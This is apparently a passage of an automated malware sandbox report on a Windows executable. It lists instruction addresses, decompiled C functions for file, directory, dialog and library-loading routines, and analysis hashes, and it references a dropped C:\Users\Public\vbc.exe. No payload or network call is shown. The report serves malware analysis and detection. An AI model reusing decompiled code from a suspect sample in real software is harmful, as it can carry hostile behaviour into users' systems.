                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                  • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                  • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                  • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x5212dc
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                                                  0x0040138a
                                                  0x004013fa
                                                  0x00401392
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                  • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                  • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                  • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                  0x00405f30
                                                  0x00405f33
                                                  0x00405f3a
                                                  0x00405f42
                                                  0x00405f4e
                                                  0x00000000
                                                  0x00405f55
                                                  0x00405f45
                                                  0x00405f4c
                                                  0x00000000
                                                  0x00405f5d
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                    • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                    • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                    • Part of subcall function 00405EBA: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                  0x00405873
                                                  0x00405880
                                                  0x00405895
                                                  0x0040589b

                                                  APIs
                                                  • GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                  • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                  0x00405854
                                                  0x0040585d
                                                  0x00000000
                                                  0x00405866
                                                  0x0040586c

                                                  APIs
                                                  • GetFileAttributesA.KERNEL32(?,0040565B,?,?,?), ref: 00405854
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                  0x004053c9
                                                  0x004053d1
                                                  0x00000000
                                                  0x004053d7
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                  • GetLastError.KERNEL32 ref: 004053D7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x00403085
                                                  0x00403098
                                                  0x004030a0
                                                  0x00000000
                                                  0x004030a7
                                                  0x00000000
                                                  0x004030a9

                                                  APIs
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                  0x004030c1
                                                  0x004030c7

                                                  APIs
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 004047D3, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x520ec4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x520d18
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
